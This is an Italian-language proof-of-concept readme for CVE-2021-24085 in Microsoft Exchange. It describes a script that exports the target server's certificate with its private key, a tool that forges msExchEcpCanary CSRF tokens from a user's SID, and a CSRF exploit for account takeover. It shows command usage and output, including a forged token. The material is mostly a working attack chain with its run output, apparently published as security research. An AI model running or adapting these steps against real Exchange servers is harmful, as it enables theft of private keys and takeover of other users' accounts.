
Questa è una prova di concetto per CVE-2021-24085.
poc.py scarica il file del certificato del target con la chiave privata all'internoYellowCanary genera il token csrf msExchEcpCanary per un utente specifico in base al SIDpoc.js è l'exploit csrf per attivare un account takeoverNon ho fornito il file malicifest.xml ma puoi trovare informazioni su come generare un file manifest dannoso dalle risorse disponibili nella sezione riferimenti di seguito.
Recupera il certificato con la chiave privata inclusa:
researcher@srcincite:~$ ./poc.py
(+) usage: ./poc.py <target> <user:pass>
(+) eg: ./poc.py 192.168.75.142 [email protected]:user123###
researcher@srcincite:~$ ./poc.py 192.168.75.142 [email protected]:user123###
(+) found the thumbprint: F4EB6AADB8D7C0D12E756BA2E28F90CCACD41299
(+) exported the cert to the target filesystem
(+) saved the cert to testcert.der using password: hax
Ora puoi generare token csrf con YellowCanary utilizzando il SID di un utente target:
c:\Users\researcher>poc.exe S-1-5-21-257332918-392067043-4020791575-3104 testcert.der hax
#====================================================
# YellowCanary - generate msExchEcpCanary csrf tokens
#====================================================
security identifier : S-1-5-21-257332918-392067043-4020791575-3104
msExchEcpCanary : sA0o0nS_C0G_PMdcA_dAd5BdAEL_-NcYhndaAwlhBJFs4a4iKy4sn53azH-O5Ix3F0jnwzZZUsk.